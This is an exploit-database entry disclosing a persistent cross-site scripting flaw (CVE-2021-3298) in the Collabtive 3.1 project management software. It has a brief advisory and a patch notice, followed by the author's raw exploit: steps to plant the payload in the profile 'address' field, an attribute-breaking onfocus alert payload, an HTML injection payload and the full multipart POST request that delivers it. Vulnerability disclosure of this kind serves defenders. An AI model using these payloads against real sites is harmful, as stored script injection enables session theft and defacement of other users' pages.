Collabtive 3.1 - 'address' Persistent Cross-Site Scripting

vendor:

Collabtive

by:

Deha Berkin Bir

5.4

CVSS

MEDIUM

Persistent Cross-Site Scripting

CWE

Product Name: Collabtive

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: Yes

Related CWE: CVE-2021-3298

CPE: a:collabtive:collabtive:3.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows & XAMPP

2021

Collabtive 3.1 – ‘address’ Persistent Cross-Site Scripting

A persistent cross-site scripting vulnerability exists in Collabtive 3.1. An attacker can exploit this vulnerability by sending a malicious payload to the 'address' field of the profile edit page. The payload will be executed when the user visits the profile edit page. This can be used to steal user data or perform other malicious activities.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Collabtive.

Source

Exploit-DB raw data:

# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Date: 2021-01-23
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
# CVE: CVE-2021-3298

==> Tutorial <==

1- Login to your account.
2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
- You will see the executed HTML payload at there. (HTML Injection)
- You will see the executed XSS payload at profile edit section. (XSS)

==> Executed Payloads <==

XSS Payload   ==>   " onfocus="alert(1)" autofocus="
HTML Payload ==>   <h1>DehaBerkinBir</h1>

==> HTTP Request <==

POST /manageuser.php?action=edit HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/manageuser.php?action=editform&id=1
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
Content-Length: 2327
Connection: close
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
Upgrade-Insecure-Requests: 1

-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="name"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="file-avatar"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="company"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="email"

dehaberkinbir@hotmail.com
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="web"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel1"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address1"

" onfocus="alert(1)" autofocus="
-----------------------------12097618915709137911841560297

Content-Disposition: form-data; name="zip"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="country"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="state"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="gender"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="locale"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="admin"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="oldpass"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="newpass"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="repeatpass"


-----------------------------12097618915709137911841560297--